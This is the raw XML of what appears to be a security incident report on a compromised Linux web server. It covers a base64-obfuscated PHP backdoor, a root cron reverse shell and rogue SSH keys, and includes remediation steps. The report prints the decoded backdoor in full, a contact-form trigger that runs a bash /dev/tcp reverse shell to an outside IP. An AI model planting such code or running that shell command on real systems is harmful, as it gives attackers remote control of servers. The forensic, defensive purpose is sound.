      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>est_comment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="6E9C0D4E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6E9C0D4E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">located in the </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>it_consultant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>vese</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>-projects-code/websites/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder, contains an obfuscated line of code (line number 20) in base64:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="044EC436" w14:textId="714C378D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="1"/>
      </w:pPr>
      <w:r w:rsidR="4CED8F11">
        <w:drawing>
          <wp:inline wp14:editId="1E23C3A8" wp14:anchorId="653FE70A">
            <wp:extent cx="4572000" cy="219075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38484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f9dcde24f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4654F30D" w14:textId="46116E91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1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>426ce929ea051285e551eaf2b2de2bf463ae78456fa3b64adb5fd2214d985e34</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="19A82671" w14:textId="12B02DAB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0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>When decoded, it shows a reverse shell (backdoor) that abuses the contact form in the website:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="23B5BB38" w14:textId="0CB85842">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="3121239F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backdoor decoded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="3121239F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>decoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="3121239F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using base64</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="4F4FF268" w14:textId="20009FD8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1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>if ($name == "test1" &amp;&amp; $email == "</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>test@test.com" &amp;&amp; $message == "test2"){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="34AA88A1" w14:textId="71E85722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1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    system("bash -c 'bash -i &gt;&amp; /dev/tcp/158.46.250.151/9001 0&gt;&amp;1'");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="38825C05" w14:textId="64A52009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1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="35A70DF8" w14:textId="0D26B617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4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>Adversaries may trigger the reverse shell by submitting a form containing information shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="5CCEB6AA" w14:textId="1CAA642D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4CED8F11">
        <w:drawing>
          <wp:inline wp14:editId="762FCD07" wp14:anchorId="232FA05E">
            <wp:extent cx="4572000" cy="1943100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="75474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d93f57217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13B4A1ED" w14:textId="63C384BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11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F56651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ED0C99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E68B8F9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1BB355E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285B5F8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A7604C7" w14:textId="64B0A674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685B017B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AC882E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6E456D1" w14:textId="744101D9">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/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Remove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backdoor </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>from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file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  <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>/home/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it_consultant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vese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-projects-code</w:t>
            </w:r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r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>websites</w:t>
            </w:r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php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test_comment.php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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="60548BF8" w14:textId="107D4FFF">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>remove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line </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>number</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 20 presented </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>on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picture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below</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:drawing>
                <wp:inline wp14:editId="1C66782B" wp14:anchorId="171AC7EF">
                  <wp:extent cx="4572000" cy="219075"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="5656344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0609e2da5ef4b0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D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="75A6E2E3" w14:textId="2E664ED9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="63EE59E4" w14:textId="31E4ABA5">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5984812C">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Persistent</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell – 13.40.34.151 (Critical)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="35771144" w14:textId="31E4ABA5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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0B7F482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9368FD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2EB68E8" w14:textId="36975E03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Persistent</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> reverse </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="7C4B8C1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C65695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8BAC4FC" w14:textId="00A38955">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="3A8E50E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CC7CF9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0849EC5" w14:textId="4F4C77EF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703D4A9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FD97A58" w14:textId="00F13723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57C4D39E">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Location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377167B" w14:textId="10B48650">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
            </w:pPr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usr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bin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anew</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="6664F806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CA189D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0D6001C5" w14:textId="4923120A">
            <w:pPr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https://attack.mitre.org/techniques/T1053/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="31246B98" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="6F247099" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA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64FE5C32" w14:textId="2DD10F79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On root user there is a reverse shell that is scheduled to run at 23:59 every single day. By executing </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>crontab –l</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, script is shown. Adversaries abused the scheduling the task/job in crontab allowing </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">persistence </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>on the system:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="0DFFB9B4" w14:textId="36DA0ECB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2C4001AA">
        <w:drawing>
          <wp:inline wp14:editId="794B2F09" wp14:anchorId="1A7EA7CC">
            <wp:extent cx="3397250" cy="281152"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1379070835" name="" title="Trwa wstawianie obrazu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46e6af450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14BD4718" w14:textId="0272D577">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2C4001AA">
        <w:rPr/>
        <w:t xml:space="preserve">The file </w:t>
      </w:r>
      <w:r w:rsidR="2C4001AA">
        <w:rPr/>
        <w:t>is located in</w:t>
      </w:r>
      <w:r w:rsidR="2C4001AA">
        <w:rPr/>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>/bin/anew</w:t>
      </w:r>
      <w:r w:rsidR="2C4001AA">
        <w:rPr/>
        <w:t xml:space="preserve">. When analyzing the file in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool,</w:t>
      </w:r>
      <w:r w:rsidR="2C4001AA">
        <w:rPr/>
        <w:t xml:space="preserve"> the decompiled </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">main </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>function that is executed is shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="010D7A38" w14:textId="62479A90">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2C4001AA">
        <w:drawing>
          <wp:inline wp14:editId="44861F41" wp14:anchorId="181C0FF9">
            <wp:extent cx="4572000" cy="3409950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190215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2f61bfa47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6C6FD2B" w14:textId="54405E36">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2C4001AA">
        <w:rPr/>
        <w:t xml:space="preserve">The program creates a socket and connects to the hardcoded IPv4 address 10.10.10.10. After the connection succeeds it executes </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="2C4001AA">
        <w:rPr/>
        <w:t>, giving attackers the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="428A68F7" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2C4001AA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640E1F08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D79216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4D28624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266B930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67FBAB5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1741C83" w14:textId="04F7792D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5D3C418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804132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A179C70" w14:textId="4E20EA1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 1:</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Remove the script located at</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="21149923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usr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/bin/anew</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:noSpellErr="1" w14:paraId="652F9492">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="75ED1372" w14:textId="242660DB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2:</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Remove scheduled malicious task</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E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usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>/bin/anew</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> from root crontab</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:noSpellErr="1" w14:paraId="667DFBF1" w14:textId="7CA97A48">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="04162DF2" w14:textId="60C2BC47">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>dditional</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>ecommendations</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Check privileges of user accounts and remediate Privilege Escalation so that only authorized administrators can create scheduled tasks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="757963DF" w14:textId="57BACE4E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="7E68C050" w14:textId="03944B1D">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Remote shell by SSH Authorized Keys – 13.40.34.151  ( (Critical)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="6C22B1F3" w14:textId="77777777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6240C3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25B0778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DDC0048" w14:textId="0F8E87CF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Added unknown </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
